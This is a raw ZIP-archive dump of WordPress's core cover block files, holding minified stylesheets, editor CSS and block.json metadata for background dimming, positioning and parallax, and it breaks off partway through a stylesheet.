.has-parallax.wp-block-cover{background-attachment:scroll}.color-block-support-panel__inner-wrapper>:not(.block-editor-tools-panel-color-gradient-settings__item){margin-top:24px}.wp-block-cover:after{min-height:auto}PK7[PuSHSHcover/style-rtl.min.cssnu[.wp-block-cover,.wp-block-cover-image{align-items:center;background-position:50%;box-sizing:border-box;direction:ltr;display:flex;justify-content:center;min-height:430px;overflow:hidden;overflow:clip;padding:1em;position:relative}.wp-block-cover .has-background-dim:not([class*=-background-color]),.wp-block-cover-image .has-background-dim:not([class*=-background-color]),.wp-block-cover-image.has-background-dim:not([class*=-background-color]),.wp-block-cover.has-background-dim:not([class*=-background-color]){background-color:#000}.wp-block-cover .has-background-dim.has-background-gradient,.wp-block-cover-image .has-background-dim.has-background-gradient{background-color:transparent}.wp-block-cover-image.has-background-dim:before,.wp-block-cover.has-background-dim:before{background-color:inherit;content:""}.wp-block-cover .wp-block-cover__background,.wp-block-cover .wp-block-cover__gradient-background,.wp-block-cover-image .wp-block-cover__background,.wp-block-cover-image .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim:not(.has-background-gradient):before,.wp-block-cover.has-background-dim:not(.has-background-gradient):before{bottom:0;left:0;opacity:.5;position:absolute;right:0;top:0;z-index:1}.wp-block-cover-image.has-background-dim.has-background-dim-10 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-10 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-10:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-10 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-10 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-10:not(.has-background-gradient):before{opacity:.1}.wp-block-cover-image.has-background-dim.has-background-dim-20 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-20 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-20:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-20 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-20 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-20:not(.has-background-gradient):before{opacity:.2}.wp-block-cover-image.has-background-dim.has-background-dim-30 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-30 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-30:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-30 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-30 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-30:not(.has-background-gradient):before{opacity:.3}.wp-block-cover-image.has-background-dim.has-background-dim-40 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-40 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-40:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-40 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-40 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-40:not(.has-background-gradient):before{opacity:.4}.wp-block-cover-image.has-background-dim.has-background-dim-50 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-50 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-50:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-50 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-50 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-50:not(.has-background-gradient):before{opacity:.5}.wp-block-cover-image.has-background-dim.has-background-dim-60 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-60 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-60:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-60 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-60 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-60:not(.has-background-gradient):before{opacity:.6}.wp-block-cover-image.has-background-dim.has-background-dim-70 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-70 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-70:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-70 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-70 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-70:not(.has-background-gradient):before{opacity:.7}.wp-block-cover-image.has-background-dim.has-background-dim-80 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-80 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-80:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-80 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-80 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-80:not(.has-background-gradient):before{opacity:.8}.wp-block-cover-image.has-background-dim.has-background-dim-90 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-90 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-90:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-90 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-90 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-90:not(.has-background-gradient):before{opacity:.9}.wp-block-cover-image.has-background-dim.has-background-dim-100 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-100 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-100:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-100 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-100 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-100:not(.has-background-gradient):before{opacity:1}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-0,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-0,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-0,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-0{opacity:0}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-10,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-10,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-10,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-10{opacity:.1}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-20,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-20,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-20,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-20{opacity:.2}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-30,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-30,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-30,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-30{opacity:.3}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-40,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-40,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-40,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-40{opacity:.4}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-50,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-50,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-50,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-50{opacity:.5}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-60,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-60,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-60,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-60{opacity:.6}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-70,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-70,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-70,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-70{opacity:.7}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-80,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-80,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-80,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-80{opacity:.8}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-90,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-90,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-90,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-90{opacity:.9}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-100,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-100,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-100,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-100{opacity:1}.wp-block-cover-image.alignleft,.wp-block-cover-image.alignright,.wp-block-cover.alignleft,.wp-block-cover.alignright{max-width:420px;width:100%}.wp-block-cover-image:after,.wp-block-cover:after{content:"";display:block;font-size:0;min-height:inherit}@supports (position:sticky){.wp-block-cover-image:after,.wp-block-cover:after{content:none}}.wp-block-cover-image.aligncenter,.wp-block-cover-image.alignleft,.wp-block-cover-image.alignright,.wp-block-cover.aligncenter,.wp-block-cover.alignleft,.wp-block-cover.alignright{display:flex}.wp-block-cover .wp-block-cover__inner-container,.wp-block-cover-image .wp-block-cover__inner-container{color:inherit;direction:rtl;width:100%;z-index:1}.wp-block-cover h1:where(:not(.has-text-color)),.wp-block-cover h2:where(:not(.has-text-color)),.wp-block-cover h3:where(:not(.has-text-color)),.wp-block-cover h4:where(:not(.has-text-color)),.wp-block-cover h5:where(:not(.has-text-color)),.wp-block-cover h6:where(:not(.has-text-color)),.wp-block-cover p:where(:not(.has-text-color)),.wp-block-cover-image h1:where(:not(.has-text-color)),.wp-block-cover-image h2:where(:not(.has-text-color)),.wp-block-cover-image h3:where(:not(.has-text-color)),.wp-block-cover-image h4:where(:not(.has-text-color)),.wp-block-cover-image h5:where(:not(.has-text-color)),.wp-block-cover-image h6:where(:not(.has-text-color)),.wp-block-cover-image p:where(:not(.has-text-color)){color:inherit}.wp-block-cover-image.is-position-top-left,.wp-block-cover.is-position-top-left{align-items:flex-start;justify-content:flex-start}.wp-block-cover-image.is-position-top-center,.wp-block-cover.is-position-top-center{align-items:flex-start;justify-content:center}.wp-block-cover-image.is-position-top-right,.wp-block-cover.is-position-top-right{align-items:flex-start;justify-content:flex-end}.wp-block-cover-image.is-position-center-left,.wp-block-cover.is-position-center-left{align-items:center;justify-content:flex-start}.wp-block-cover-image.is-position-center-center,.wp-block-cover.is-position-center-center{align-items:center;justify-content:center}.wp-block-cover-image.is-position-center-right,.wp-block-cover.is-position-center-right{align-items:center;justify-content:flex-end}.wp-block-cover-image.is-position-bottom-left,.wp-block-cover.is-position-bottom-left{align-items:flex-end;justify-content:flex-start}.wp-block-cover-image.is-position-bottom-center,.wp-block-cover.is-position-bottom-center{align-items:flex-end;justify-content:center}.wp-block-cover-image.is-position-bottom-right,.wp-block-cover.is-position-bottom-right{align-items:flex-end;justify-content:flex-end}.wp-block-cover-image.has-custom-content-position.has-custom-content-position .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position .wp-block-cover__inner-container{margin:0}.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-bottom-left .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-bottom-right .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-center-left .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-center-right .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-top-left .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-top-right .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-bottom-left .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-bottom-right .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-center-left .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-center-right .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-top-left .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-top-right .wp-block-cover__inner-container{margin:0;width:auto}.wp-block-cover .wp-block-cover__image-background,.wp-block-cover video.wp-block-cover__video-background,.wp-block-cover-image .wp-block-cover__image-background,.wp-block-cover-image video.wp-block-cover__video-background{border:none;bottom:0;box-shadow:none;height:100%;left:0;margin:0;max-height:none;max-width:none;object-fit:cover;outline:none;padding:0;position:absolute;right:0;top:0;width:100%}.wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{background-attachment:fixed;background-repeat:no-repeat;background-size:cover}@supports (-webkit-touch-callout:inherit){.wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{background-attachment:scroll}}@media (prefers-reduced-motion:reduce){.wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{background-attachment:scroll}}.wp-block-cover-image.is-repeated,.wp-block-cover.is-repeated,.wp-block-cover__image-background.is-repeated,video.wp-block-cover__video-background.is-repeated{background-repeat:repeat;background-size:auto}.wp-block-cover__image-background,.wp-block-cover__video-background{z-index:0}.wp-block-cover-image-text,.wp-block-cover-image-text a,.wp-block-cover-image-text a:active,.wp-block-cover-image-text a:focus,.wp-block-cover-image-text a:hover,.wp-block-cover-text,.wp-block-cover-text a,.wp-block-cover-text a:active,.wp-block-cover-text a:focus,.wp-block-cover-text a:hover,section.wp-block-cover-image h2,section.wp-block-cover-image h2 a,section.wp-block-cover-image h2 a:active,section.wp-block-cover-image h2 a:focus,section.wp-block-cover-image h2 a:hover{color:#fff}.wp-block-cover-image .wp-block-cover.has-left-content{justify-content:flex-start}.wp-block-cover-image .wp-block-cover.has-right-content{justify-content:flex-end}.wp-block-cover-image.has-left-content .wp-block-cover-image-text,.wp-block-cover.has-left-content .wp-block-cover-text,section.wp-block-cover-image.has-left-content>h2{margin-right:0;text-align:right}.wp-block-cover-image.has-right-content .wp-block-cover-image-text,.wp-block-cover.has-right-content .wp-block-cover-text,section.wp-block-cover-image.has-right-content>h2{margin-left:0;text-align:left}.wp-block-cover .wp-block-cover-text,.wp-block-cover-image .wp-block-cover-image-text,section.wp-block-cover-image>h2{font-size:2em;line-height:1.25;margin-bottom:0;max-width:840px;padding:.44em;text-align:center;z-index:1}:where(.wp-block-cover-image:not(.has-text-color)),:where(.wp-block-cover:not(.has-text-color)){color:#fff}:where(.wp-block-cover-image.is-light:not(.has-text-color)),:where(.wp-block-cover.is-light:not(.has-text-color)){color:#000}PK7[œ cover/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/cover", "title": "Cover", "category": "media", "description": "Add an image or video with a text overlay.", "textdomain": "default", "attributes": { "url": { "type": "string" }, "useFeaturedImage": { "type": "boolean", "default": false }, "id": { "type": "number" }, "alt": { "type": "string", "source": "attribute", "selector": "img", "attribute": "alt", "default": "" }, "hasParallax": { "type": "boolean", "default": false }, "isRepeated": { "type": "boolean", "default": false }, "dimRatio": { "type": "number", "default": 100 }, "overlayColor": { "type": "string" }, "customOverlayColor": { "type": "string" }, "backgroundType": { "type": "string", "default": "image" }, "focalPoint": { "type": "object" }, "minHeight": { "type": "number" }, "minHeightUnit": { "type": "string" }, "gradient": { "type": "string" }, "customGradient": { "type": "string" }, "contentPosition": { "type": "string" }, "isDark": { "type": "boolean", "default": true }, "allowedBlocks": { "type": "array" }, "templateLock": { "type": [ "string", "boolean" ], "enum": [ "all", "insert", "contentOnly", false ] }, "tagName": { "type": "string", "default": "div" } }, "usesContext": [ "postId", "postType" ], "supports": { "anchor": true, "align": true, "html": false, "spacing": { "padding": true, "margin": [ "top", "bottom" ], "blockGap": true, "__experimentalDefaultControls": { "padding": true, "blockGap": true } }, "__experimentalBorder": { "color": true, "radius": true, "style": true, "width": true, "__experimentalDefaultControls": { "color": true, "radius": true, "style": true, "width": true } }, "color": { "__experimentalDuotone": "> .wp-block-cover__image-background, > .wp-block-cover__video-background", "heading": true, "text": true, "background": false, "__experimentalSkipSerialization": [ "gradients" ], "enableContrastChecker": false }, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalFontWeight": true, "__experimentalFontStyle": true, "__experimentalTextTransform": true, "__experimentalTextDecoration": true, "__experimentalLetterSpacing": true, "__experimentalDefaultControls": { "fontSize": true } }, "layout": { "allowJustification": false } }, "editorStyle": "wp-block-cover-editor", "style": "wp-block-cover" } PK7[Ycover/editor.cssnu[.editor-styles-wrapper .wp-block-cover{ box-sizing:border-box; } .wp-block-cover.is-placeholder{ align-items:stretch; display:flex; min-height:240px; padding:0 !important; } .wp-block-cover.is-placeholder .components-placeholder.is-large{ justify-content:flex-start; z-index:1; } .wp-block-cover.is-placeholder:focus:after{ min-height:auto; } .wp-block-cover.components-placeholder h2{ color:inherit; } .wp-block-cover.is-transient:before{ background-color:#fff; opacity:.3; } .wp-block-cover .components-spinner{ left:50%; margin:0; position:absolute; top:50%; transform:translate(-50%, -50%); z-index:1; } .wp-block-cover .wp-block-cover__inner-container{ margin-left:0; margin-right:0; text-align:left; } .wp-block-cover .wp-block-cover__placeholder-background-options{ width:100%; } .wp-block-cover .wp-block-cover__image--placeholder-image{ bottom:0; left:0; position:absolute; right:0; top:0; } [data-align=left]>.wp-block-cover,[data-align=right]>.wp-block-cover{ max-width:420px; width:100%; } .block-library-cover__reset-button{ margin-left:auto; } .block-library-cover__resize-container{ bottom:0; left:0; min-height:50px; position:absolute !important; right:0; top:0; } .components-popover.block-editor-block-popover.block-library-cover__resizable-box-popover .block-library-cover__resize-container,.components-popover.block-editor-block-popover.block-library-cover__resizable-box-popover .components-popover__content>div{ overflow:visible; pointer-events:none; } .wp-block-cover>.components-drop-zone .components-drop-zone__content{ opacity:.8 !important; } .block-editor-block-patterns-list__list-item .has-parallax.wp-block-cover{ background-attachment:scroll; } .color-block-support-panel__inner-wrapper>:not(.block-editor-tools-panel-color-gradient-settings__item){ margin-top:24px; } .wp-block-cover:after{ min-height:auto; }PK7[~17H7Hcover/style.min.cssnu[.wp-block-cover,.wp-block-cover-image{align-items:center;background-position:50%;box-sizing:border-box;display:flex;justify-content:center;min-height:430px;overflow:hidden;overflow:clip;padding:1em;position:relative}.wp-block-cover .has-background-dim:not([class*=-background-color]),.wp-block-cover-image .has-background-dim:not([class*=-background-color]),.wp-block-cover-image.has-background-dim:not([class*=-background-color]),.wp-block-cover.has-background-dim:not([class*=-background-color]){background-color:#000}.wp-block-cover .has-background-dim.has-background-gradient,.wp-block-cover-image .has-background-dim.has-background-gradient{background-color:transparent}.wp-block-cover-image.has-background-dim:before,.wp-block-cover.has-background-dim:before{background-color:inherit;content:""}.wp-block-cover .wp-block-cover__background,.wp-block-cover .wp-block-cover__gradient-background,.wp-block-cover-image .wp-block-cover__background,.wp-block-cover-image .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim:not(.has-background-gradient):before,.wp-block-cover.has-background-dim:not(.has-background-gradient):before{bottom:0;left:0;opacity:.5;position:absolute;right:0;top:0;z-index:1}.wp-block-cover-image.has-background-dim.has-background-dim-10 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-10 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-10:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-10 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-10 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-10:not(.has-background-gradient):before{opacity:.1}.wp-block-cover-image.has-background-dim.has-background-dim-20 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-20 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-20:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-20 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-20 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-20:not(.has-background-gradient):before{opacity:.2}.wp-block-cover-image.has-background-dim.has-background-dim-30 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-30 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-30:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-30 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-30 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-30:not(.has-background-gradient):before{opacity:.3}.wp-block-cover-image.has-background-dim.has-background-dim-40 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-40 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-40:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-40 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-40 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-40:not(.has-background-gradient):before{opacity:.4}.wp-block-cover-image.has-background-dim.has-background-dim-50 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-50 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-50:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-50 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-50 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-50:not(.has-background-gradient):before{opacity:.5}.wp-block-cover-image.has-background-dim.has-background-dim-60 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-60 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-60:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-60 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-60 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-60:not(.has-background-gradient):before{opacity:.6}.wp-block-cover-image.has-background-dim.has-background-dim-70 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-70 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-70:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-70 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-70 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-70:not(.has-background-gradient):before{opacity:.7}.wp-block-cover-image.has-background-dim.has-background-dim-80 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-80 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-80:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-80 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-80 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-80:not(.has-background-gradient):before{opacity:.8}.wp-block-cover-image.has-background-dim.has-background-dim-90 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-90 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-90:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-90 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-90 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-90:not(.has-background-gradient):before{opacity:.9}.wp-block-cover-image.has-background-dim.has-background-dim-100 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-100 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-100:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-100 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-100 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-100:not(.has-background-gradient):before{opacity:1}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-0,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-0,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-0,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-0{opacity:0}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-10,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-10,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-10,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-10{opacity:.1}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-20,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-20,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-20,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-20{opacity:.2}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-30,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-30,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-30,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-30{opacity:.3}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-40,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-40,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-40,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-40{opacity:.4}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-50,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-50,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-50,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-50{opacity:.5}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-60,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-60,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-60,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-60{opacity:.6}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-70,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-70,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-70,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-70{opacity:.7}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-80,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-80,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-80,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-80{opacity:.8}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-90,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-90,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-90,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-90{opacity:.9}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-100,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-100,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-100,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-100{opacity:1}.wp-block-cover-image.alignleft,.wp-block-cover-image.alignright,.wp-block-cover.alignleft,.wp-block-cover.alignright{max-width:420px;width:100%}.wp-block-cover-image:after,.wp-block-cover:after{content:"";display:block;font-size:0;min-height:inherit}@supports (position:sticky){.wp-block-cover-image:after,.wp-block-cover:after{content:none}}.wp-block-cover-image.aligncenter,.wp-block-cover-image.alignleft,.wp-block-cover-image.alignright,.wp-block-cover.aligncenter,.wp-block-cover.alignleft,.wp-block-cover.alignright{display:flex}.wp-block-cover .wp-block-cover__inner-container,.wp-block-cover-image .wp-block-cover__inner-container{color:inherit;width:100%;z-index:1}.wp-block-cover h1:where(:not(.has-text-color)),.wp-block-cover h2:where(:not(.has-text-color)),.wp-block-cover h3:where(:not(.has-text-color)),.wp-block-cover h4:where(:not(.has-text-color)),.wp-block-cover h5:where(:not(.has-text-color)),.wp-block-cover h6:where(:not(.has-text-color)),.wp-block-cover p:where(:not(.has-text-color)),.wp-block-cover-image h1:where(:not(.has-text-color)),.wp-block-cover-image h2:where(:not(.has-text-color)),.wp-block-cover-image h3:where(:not(.has-text-color)),.wp-block-cover-image h4:where(:not(.has-text-color)),.wp-block-cover-image 